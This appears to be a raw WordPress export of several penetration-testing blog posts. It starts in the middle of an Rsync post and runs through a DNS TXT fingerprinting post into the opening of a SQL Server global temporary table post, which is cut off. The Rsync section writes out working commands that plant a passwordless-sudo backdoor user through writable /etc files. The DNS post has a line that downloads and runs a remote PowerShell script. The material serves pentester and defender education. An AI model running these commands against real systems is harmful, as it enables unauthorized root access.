  1. Create the user entry to inject.
  2. Download /etc/passwd. (and back it up so you can restore state later)
  3. Append the new user entry to the end of passwd.
  4. Upload / Overwrite the existing /etc/passwd

Note: Feel free to change the UID, but make sure it matches the value set in the /etc/group file. :) In this case the UID/GID are both 1021.

Add New User Entry to /etc/passwd:

rsync -R 192.168.1.171::files/etc/passwd .
cp ./etc/passwd ../backup
echo "myuser:x:1021:1021::/home/myuser:/bin/bash" >> ./etc/passwd
rsync ./etc/passwd 192.168.1.171::files/etc/

Create the Group File Entry
The /etc/group file is used to keep track of registered group information on the system. It does not contain encrypted passwords. It can be read by all users.

To inject a new user entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/group. (and backup, just in case)
  3. Append the new user entry to the end of group.
  4. Upload / Overwrite the existing /etc/group file.

Note: Feel free to change the UID, but make sure it matches the value set in the /etc/passwd file. :) In this case the UID/GID are both 1021.

Add New User Entry to /etc/group:

rsync -R 192.168.1.171::files/etc/group .
cp ./etc/group ../backup
echo "myuser:x:1021:" >> ./etc/group
rsync ./etc/group 192.168.1.171::files/etc/

Create Sudoers File Entry
The /etc/sudoers file contains a list of users that are allowed to run commands as root using the sudo command. It can only be read by root. We are going to modify it to allow the new user to execute any command through sudo.

To inject an entry via Rsync you’ll have to:

  1. Create the user entry to inject.
  2. Download /etc/sudoers. (and backup, just in case)
  3. Append the new user entry to the end of sudoers.
  4. Upload / Overwrite the existing /etc/sudoers file.

Add New User Entry to /etc/sudoers:

rsync -R 192.168.1.171::files/etc/sudoers .
cp ./etc/sudoers ../backup
echo "myuser ALL=(ALL) NOPASSWD:ALL" >> ./etc/sudoers   
rsync ./etc/sudoers 192.168.1.171::files/etc/

Now you can simply log into the server via SSH using your newly created user and sudo sh to root!
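The four file edits above can be consolidated into one script. The sketch below performs them against local copies in a made-up etcdemo directory (the rsync download/upload steps are omitted so it runs offline), using the example username, UID/GID, and hash from the walkthrough:

```shell
# Stand-in copies of the downloaded files (real ones would come from rsync -R)
mkdir -p etcdemo
echo 'root:x:0:0:root:/root:/bin/bash' > etcdemo/passwd
echo 'root:*:17861:0:99999:7:::' > etcdemo/shadow
echo 'root:x:0:' > etcdemo/group
echo 'root ALL=(ALL) ALL' > etcdemo/sudoers

# Append the new privileged user to each file
echo 'myuser:MjHKz4C0Z0VCI:17861:0:99999:7:::' >> etcdemo/shadow
echo 'myuser:x:1021:1021::/home/myuser:/bin/bash' >> etcdemo/passwd
echo 'myuser:x:1021:' >> etcdemo/group
echo 'myuser ALL=(ALL) NOPASSWD:ALL' >> etcdemo/sudoers
```

The modified copies would then be uploaded back over the originals with the rsync upload commands shown earlier.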

Attacking Rsync Demo Video

Below is a video created in a lab environment that shows the process of identifying and exploiting an insecurely configured Rsync server to gain a root shell. While it may seem too simple to be true, it is based on configurations exploited during real penetration tests.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerability that provided write access.  While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems.   Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured Rsync servers.  Good luck and hack responsibly!

The next blog in the series focuses on NFS and setuid binaries; it can be found here.

References

[post_title] => Linux Hacking Case Studies Part 1: Rsync [post_excerpt] => This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-1-rsync [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:30 [post_modified_gmt] => 2022-04-04 15:01:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11299 [menu_order] => 519 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 17444 [post_author] => 53 [post_date] => 2020-02-23 15:37:45 [post_date_gmt] => 2020-02-23 15:37:45 [post_content] =>

Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red team operations. PowerUpSQL is an open source tool available on GitHub, learn more at https://powerupsql.com/.

For more open source projects from NetSPI check out https://github.com/netspi.

https://youtu.be/7sT1OQEtXlg
[post_title] => Attacking Modern Environments through SQL Server with PowerUpSQL [post_excerpt] => Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-modern-environments-through-sql-server-with-powerupsql [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:18:39 [post_modified_gmt] => 2023-09-01 12:18:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17444 [menu_order] => 80 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [29] => WP_Post Object ( [ID] => 11219 [post_author] => 17 [post_date] => 2019-11-18 07:00:30 [post_date_gmt] => 2019-11-18 07:00:30 [post_content] => DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company. In this blog I’ll walkthrough how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint. Below is an overview of the content if you want to skip ahead:

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”. Below is an outline of how that process typically works:
  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.
It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using.

Note: The domain validation process doesn’t always require a DNS TXT entry. Some online service providers simply request that you upload a text file containing the domain validation token to the webroot of the domain’s website. For example, https://mywebsite.com/validation_12345.txt. Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites. I used a slightly older list, but for those looking to mine that information on a recurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security-focused tools like dnsrecon. I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites. Below is the basic collection script I used.
# Import list of domains
$Domains = gc c:\temp\domains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results
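For those who prefer a shell over PowerShell, the SPF-filtering step can be sketched with standard tools. Real collection would use something like `dig +short TXT <domain>`; the sample records below are hardcoded (and made up, apart from the google-site-verification example) so the filtering logic can run offline:

```shell
# Sample output in the shape dig +short TXT would return
txt_records='"v=spf1 include:_spf.google.com ~all"
"google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E"
"MS=ms12345678"'

# Drop SPF records and surrounding quotes, keeping likely validation tokens
tokens=$(printf '%s\n' "$txt_records" | grep -v 'v=spf' | tr -d '"')
```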

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:
  1. Removed remaining SPF records
  2. Parsed key value pairs
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation. Below are the top 5 categories:
  1. Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
  2. Certificate Authorities like GlobalSign were a close second.
  3. Electronic Document Signing providers like Adobe Sign and DocuSign hang around third place.
  4. Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
  5. Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.
There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically they are not domain validation tokens. However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well. Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.
 COUNT PROVIDER CATEGORY EXAMPLE TOKEN
149785 gmail.com Cloud Services google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 microsoft office 365 Cloud Services ms=hash
16028 facebook.com Cloud Services facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 globalsign.com Certificate Authority _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 Adobe Enterprise Services Electronic Signing,Cloud Services adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 Amazon Simple Email Cloud Services amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 globalsign.com Certificate Authority globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO--GxX7laTgCizBTW
3486 atlassian services Collaboration atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 mailru- Cloud Services mailru-verification: fa868a61bb236ae5
2698 yandex.com Cloud Services yandex-verification=fb9a7e8303137b4c
2429 Pardot (Salesforce) Marketing and Analytics pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 docusign.com Electronic Signing docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 webex Collaboration webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 www.sendinblue.com Marketing and Analytics Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 zoho.com Email zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 dropbox.com Collaboration dropbox-domain-verification=zsp1beovavgv
675 webex.com Collaboration ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 Spiceworks.com Security workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 haveibeenpwned.com Security have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 citrix.com Collaboration citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 brave.com Collaboration brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 Adobe Sign / Document Cloud Electronic Signing adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 Firebase (Google) Development and Publishing firebase=solar-virtue-511
384 O365 Cloud Services mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 loader.io Security loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I've written a PowerShell function called "Resolve-DnsDomainValidationToken".  You can simply provide it domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs. Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I've provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.
# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results
For those of you that don't like staring at the console, the results can also be viewed using Out-GridView.
# View record in the out-grid view
$Results | Out-GridView
Finally, the command also automatically creates two CSV files that contain the results:
  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could fingerprinted.

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we've used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA. This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment. In many cases they aren’t configured with multi-factor authentication (MFA). Common examples include Office 365, AWS, G Suite, and Github. Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names. You can do that with Karl’s Get-AzureDomainInfo.ps1 script.
  2. Subdomain Hijacking Targets. The domain validation tokens could reveal services that support subdomains, which can be hijacked once the CNAME records go stale. For information on common techniques, Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:
    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they use 3rd party marketing and analytics? If so, who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certifications? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly! [post_title] => Analyzing DNS TXT Records to Fingerprint Online Service Providers [post_excerpt] => In this blog I'll share a process/script that can be used to identify online service providers used by a target company through domain validation tokens stored in DNS TXT records. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => analyzing-dns-txt-records-to-fingerprint-service-providers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:16 [post_modified_gmt] => 2021-06-08 21:58:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11219 [menu_order] => 540 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [30] => WP_Post Object ( [ID] => 11191 [post_author] => 17 [post_date] => 2019-11-11 07:00:58 [post_date_gmt] => 2019-11-11 07:00:58 [post_content] => SQL Server global temporary tables usually aren’t an area of focus during network and application penetration tests.  However, they are periodically used insecurely by developers to store sensitive data and code blocks that can be accessed by unprivileged users.  In this blog, I'll walk through how global temporary tables work, and share some techniques that we’ve used to identify and exploit them in real applications. If you don't want to read through everything you can jump ahead:

Lab Setup

  1. Install SQL Server. Most of the scenarios we’ll cover can be executed with SQL Server Express, but if you want to follow along with the case study you will need to use one of the commercial versions that supports agent jobs.
  2. Log into the SQL Server as a sysadmin.
  3. Create a least privilege login.
-- Create server login
CREATE LOGIN [basicuser] WITH PASSWORD = 'Password123!';

What are Global Temporary Tables?

There are many ways to store data temporarily in SQL Server, but temporary tables seem to be one of the most popular methods. Based on what I’ve seen, there are three types of temporary tables commonly used by developers: table variables, local temporary tables, and global temporary tables. Each has its pros, cons, and specialized use cases, but global temporary tables tend to create the most risk, because they can be read and modified by any SQL Server user. As a result, using global temporary tables often results in race conditions that can be exploited by least privilege users to gain unauthorized access to data and privileges.

How do Temporary Tables Work?

In this section I’ve provided a primer that covers how to create the three types of temporary tables, where they’re stored, and who can access them. To get us started let’s sign into SQL Server using our sysadmin login and review each of the three types of temp tables. All of the temporary tables are stored in the tempdb database and can be listed using the query below.
SELECT *
FROM tempdb.sys.objects
WHERE name like '#%';
All users in SQL Server can execute the query above, but the access users have to the tables displayed depends largely on the table type and scope. Below is a summary of the scope for each type of temporary table:

  • Table variables are limited to a single query batch within the current session.
  • Local temporary tables are limited to the current session, but persist across batches.
  • Global temporary tables are accessible to all active sessions.

With that foundation in place, let’s walk through some TSQL exercises to help better understand each of those scope boundaries.

Exercise 1: Table Variables

Table variables are limited to a single query batch within the current user’s active session.  They’re not accessible to other query batches, or to other active user sessions. As a result, it’s not very likely that data would be leaked to unprivileged users. Below is an example of referencing a table variable in the same batch.
-- Create table variable
If not Exists (SELECT name FROM tempdb.sys.objects WHERE name = 'table_variable')
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into table variable
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')

-- Query table variable in same batch 
SELECT * 
FROM @table_variable
GO
We can see from the output above that we are able to query the table variable within the same batch. However, when we separate the table creation and table data selection into two batches using “GO”, the table variable is no longer accessible outside of its original batch. Hopefully that helps illustrate the scope limitations of table variables, but you might still be wondering how they’re stored. When you create a table variable it’s stored in tempdb using a name starting with a “#” and randomly generated characters. The query below can be used to filter for table variables being used.
SELECT * 
FROM tempdb.sys.objects  
WHERE name not like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Exercise 2: Local Temporary Tables

Like table variables, local temporary tables are limited to the current user’s active session, but they are not limited to a single batch. For that reason, they offer more flexibility than table variables, but still don’t increase the risk of unintended data exposure, because other active user sessions can’t access them.  Below is a basic example showing how to create and access local temporary tables across different query batches within the same session.
-- Create local temporary table
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL)
CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records local temporary table
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query local temporary table
SELECT * 
FROM #LocalTempTbl
GO
Img Local Temp Table

As you can see from the image above, the table data can still be accessed across multiple query batches. Similar to table variables, all local temporary table names need to start with a "#". Other than that, you can name them whatever you want. They are also stored in the tempdb database, but SQL Server appends additional information to the end of the table name so access can be constrained to your session. Let's see what our new table "#LocalTempTbl" looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE name like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1
Img Local Temp Table

Above we can see that the table we created, "#LocalTempTbl", had additional session information appended to its name. All users can see the temp table name, but only the session that created it can access its contents. The numeric identifier appended to the end increments with each session made to the server, and you can actually use the full name to query the table from within your session. Below is an example.
SELECT * 
FROM tempdb..[ #LocalTempTbl_______________________________________________________________________________________________________000000000007]
Img Local Temp Table

However, if you attempt to access that temp table from another user's session, you get the following error.

Img Local Temp Table

Regardless, when you're done with the local temporary table, it can be removed by terminating your session or by explicitly dropping it using the example command below.
DROP TABLE #LocalTempTbl
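If you're scripting cleanup, you may want to guard the DROP so it doesn't error when the table has already been removed. A minimal sketch, using the same OBJECT_ID existence check shown when the table was created:

```sql
-- Drop the local temporary table only if it still exists in this session
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NOT NULL)
    DROP TABLE #LocalTempTbl
```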

Exercise 3: Global Temporary Tables

Ready to level up? Similar to local temporary tables, you can create and access global temporary tables from separate query batches. The big difference is that ALL active user sessions can view and modify global temporary tables. Let's take a look at a basic example below.
-- Create global temporary table
IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL)
CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into global temporary table
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query global temporary table
SELECT * 
FROM ##GlobalTempTbl
GO
Img Global Temp Table

Above we can see that we are able to query the global temporary table across different query batches. All global temporary table names need to start with "##". Other than that, you can name them whatever you want. They are also stored in the tempdb database. Let's see what our new table "##GlobalTempTbl" looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE (select len(name) - len(replace(name,'#',''))) > 1
Img Global Temp Table

You can see that SQL Server doesn't append any session-related data to the table name like it does with local temporary tables, because global temporary tables are intended to be used by all sessions. Let's sign into another session using the "basicuser" login we created earlier to show that's possible.

Img Global Temp Table

As you can see, if a global temporary table contains sensitive data, it's now exposed to all of the SQL Server's users.
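To see the exposure for yourself, a second session connected with a low-privileged login (such as the "basicuser" login from earlier) can both read and modify the table. A quick sketch of what that second session could run:

```sql
-- Run from a second, low-privileged session (e.g. the basicuser login)

-- Read the data another session placed in the global temporary table
SELECT * FROM ##GlobalTempTbl

-- Worse, the contents can also be modified by any active session
UPDATE ##GlobalTempTbl
SET RealName = 'Tampered'
WHERE Spy_id = 1
```

This read/write access from any session is exactly what makes global temporary tables interesting from an attacker's perspective.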

How do I Find Vulnerable Global Temporary Tables?

It’s easy to target global temporary tables when you know the table name, but most auditors and attackers won’t know where the bodies are buried. So, in this section I’ll cover a few ways you can blindly locate potentially exploitable global temporary tables:
  • Review Source Code if you’re a privileged user.
  • Monitor Global Temporary Tables if you’re an unprivileged user.

Review Source Code

If you’re logged into SQL Server as a sysadmin or a user with other privileged roles, you can directly query the TSQL source code of agent jobs, stored procedures, functions, and triggers in each database. You should be able to filter the query results for the string “##” to identify global temporary table usage in the TSQL. With the filtered list in hand, you can review the relevant TSQL source code and determine under which conditions the global temporary tables are vulnerable to attack. Below are some links to TSQL query templates to get you started. It’s worth noting that PowerUpSQL also supports functions that can be used to query for that information. Those functions include:
  • Get-SQLAgentJob
  • Get-SQLStoredProcedure
  • Get-SQLTriggerDdl
  • Get-SQLTriggerDml
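As one example of the source code review approach, stored procedure, function, and trigger definitions for the current database can be pulled from sys.sql_modules and filtered for "##". A minimal sketch (run it in each database you want to review):

```sql
-- List modules in the current database whose definitions
-- reference global temporary tables (names containing "##")
SELECT OBJECT_NAME(object_id) AS module_name,
       definition
FROM sys.sql_modules
WHERE definition LIKE '%##%'
```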
It would be nice if we could always just view the source code, but the reality is that most attackers won’t have sysadmin privileges out of the gate. So, when you find yourself in that position, it’s time to change your approach.

Monitor Global Temporary Tables

Now let’s talk about blindly identifying global temporary tables from a least privilege perspective.  In the previous sections, we showed how to list temporary table names and query their contents. However, we didn’t have easy insight into the columns.  So below I’ve extended the original query to include that information.
-- List global temp tables, columns, and column types
SELECT t1.name as 'Table_Name',
       t2.name as 'Column_Name',
       t3.name as 'Column_Type',
       t1.create_date,
       t1.modify_date,
       t1.parent_object_id       
FROM tempdb.sys.objects AS t1
JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
If you didn’t DROP “##GlobalTempTbl”, then you should see something similar to the results below when you execute the query.

Img Global Temp Table

Running the query above provides insight into the global temporary tables being used at that moment, but it doesn’t help us monitor for their use over time. Remember, temporary tables are commonly only used for a short period of time, so you don’t want to miss them. The query below is a variation of the first query, but it will provide a list of global temporary tables every second. The delay can be changed by modifying the “WAITFOR” statement, but be careful not to overwhelm the server. If you’re not sure what you’re doing, this technique should only be practiced in non-production environments.
-- Loop
While 1=1
BEGIN
    SELECT t1.name as 'Table_Name',
           t2.name as 'Column_Name',
           t3.name as 'Column_Type',
           t1.create_date,
           t1.modify_date,
           t1.parent_object_id       
    FROM tempdb.sys.objects AS t1
    JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
    JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
    WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1

    -- Wait one second before checking again
    WAITFOR DELAY '00:00:01'
END